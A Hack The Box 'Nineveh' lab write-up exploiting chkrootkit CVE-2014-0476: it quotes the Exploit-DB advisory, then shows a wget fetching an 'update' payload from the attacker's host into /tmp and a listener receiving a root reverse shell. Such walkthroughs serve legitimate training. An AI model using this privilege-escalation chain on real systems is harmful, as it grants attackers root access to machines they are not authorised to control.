CVE-2014-0476
This apparently happens to include the running instance of Chkrootkit on the target system
Exploit
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ searchsploit -x linux/local/33899.txt
Exploit: Chkrootkit 0.49 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/33899
Path: /usr/share/exploitdb/exploits/linux/local/33899.txt
Codes: CVE-2014-0476, OSVDB-107710
Verified: True
File Type: ASCII textWe just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port=
if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
else
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}
fi
}
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
file_port="$file_port $i"
I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.
It says that an attacker is able have code execution via Chkrootkit by placing an executable to /tmp/update
Privilege Escalation
amrois@nineveh:/report$ cd /tmp
amrois@nineveh:/tmp$ wget http://10.10.14.5:8000/update ; chmod 777 update
--2023-01-16 19:32:09-- http://10.10.14.5:8000/update
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 194 [application/octet-stream]
saving to: ‘update’
update 100%[========================================================================================>] 194 --.-KB/s in 0s
2023-01-16 19:32:09 (57.0 MB/s) - ‘update’ saved [194/194]I changed the working directory to /tmp and transferred the payload and changed its permission bits to 777
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.43] 35836
whoami
root
hostname
nineveh
ifconfig
ens160 link encap:Ethernet HWaddr 00:50:56:b9:17:ee
inet addr:10.10.10.43 Bcast:10.10.10.255 Mask:255.255.255.0
up broadcast running multicast mtu:1500 Metric:1
rx packets:20763 errors:0 dropped:0 overruns:0 frame:0
tx packets:42577 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:5312714 (5.3 MB) TX bytes:6835558 (6.8 MB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
up loopback running mtu:65536 Metric:1
rx packets:160 errors:0 dropped:0 overruns:0 frame:0
tx packets:160 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:11840 (11.8 KB) TX bytes:11840 (11.8 KB)I got a connection System Level Compromise